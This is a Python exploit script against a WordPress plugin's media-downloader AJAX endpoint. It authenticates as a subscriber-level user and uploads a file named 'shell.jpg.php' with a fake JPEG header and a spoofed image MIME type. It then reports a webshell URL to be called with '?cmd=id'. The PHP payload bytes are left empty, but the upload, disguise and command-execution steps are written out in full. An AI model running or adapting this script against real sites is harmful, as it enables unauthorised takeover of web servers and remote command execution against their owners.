#!/usr/bin/env python3 import requests import argparse def wp_login(site_url, username, password): """Authenticate to WordPress and return session cookies""" login_url = f"{site_url}/wp-login.php" session = requests.Session() # Get nonce (if needed) resp = session.get(login_url) # Submit login login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } session.post(login_url, data=login_data) return session def exploit(session, target_url): """Upload a disguised PHP webshell""" upload_url = f"{target_url}/wp-admin/admin-ajax.php?action=aeropage_media_downloader" # Craft malicious .php file with fake image headers malicious_php = ( b"\xFF\xD8\xFF\xE0" # Fake JPEG header b"" ) # Spoof MIME as image/jpeg files = { "file": ("shell.jpg.php", malicious_php, "image/jpeg") } # Send upload request print(f"[*] Uploading malicious file to {upload_url}") r = session.post(upload_url, files=files) if r.status_code == 200 and "success" in r.text.lower(): print("[+] Exploit succeeded! Webshell uploaded.") # Extract upload path from response (adjust regex as needed) import re match = re.search(r"File saved at: (.+?\.php)", r.text) if match: print(f"[+] Webshell URL: {match.group(1)}?cmd=id") else: print(f"[-] Upload failed (HTTP {r.status_code})") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL") parser.add_argument("-l", "--login", required=True, help="Subscriber username") parser.add_argument("-p", "--password", required=True, help="Subscriber password") args = parser.parse_args() # Step 1: Authenticate print(f"[*] Logging in as {args.login}...") session = wp_login(args.url, args.login, args.password) # Step 2: Exploit exploit(session, args.url)